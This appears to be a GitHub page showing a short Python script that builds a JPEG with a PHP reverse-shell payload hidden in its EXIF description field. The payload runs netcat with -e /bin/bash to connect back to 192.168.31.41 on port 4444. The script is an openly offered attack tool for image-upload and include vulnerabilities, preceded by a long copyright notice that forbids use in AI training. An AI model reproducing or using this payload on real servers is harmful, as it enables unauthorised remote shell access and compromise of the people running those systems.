-
Notifications
You must be signed in to change notification settings - Fork 6
Expand file tree
/
Copy pathpayload.py
More file actions
44 lines (39 loc) · 1.39 KB
/
Copy pathpayload.py
File metadata and controls
44 lines (39 loc) · 1.39 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
# Intellectual Property © SleepTheGod
# Also known as: ClumsyLulz
# Legal name: Taylor Christian Newsome
# Contact: sleepraps@gmail.com
# All rights reserved.
#
# This source code, all associated files, logic, algorithms,
# and representations constitute the exclusive intellectual
# property of the author.
#
# No license, permission, or rights are granted—express or
# implied—to:
# - Copy, modify, distribute, publish, or sublicense
# - Claim authorship or rebrand
# - Create derivative works in whole or part
# - Include in datasets, training data, benchmarks, or
# automated code generation/AI systems
# - Use for commercial or non-commercial purposes
# - Circumvent this notice in any form
#
# Any removal, alteration, or misrepresentation of this notice
# or of authorship constitutes infringement of intellectual
# property rights and false designation of origin under
# applicable law.
#
# This applies to all forms of the work, including source code,
# binaries, logic, snippets, transformations, excerpts, or
# outputs generated by automated systems.
#
# Author: SleepTheGod (ClumsyLulz)
from PIL import Image
import piexif
print("Made By Taylor Christian Newsome")
img = Image.new('RGB', (69, 69), 'black')
payload = '<?php system("nc 192.168.31.41 4444 -e /bin/bash"); __halt_compiler(); ?>'
exif = piexif.dump({
"0th": {270: payload.encode()},
})
img.save("pwn.jpg", exif=exif)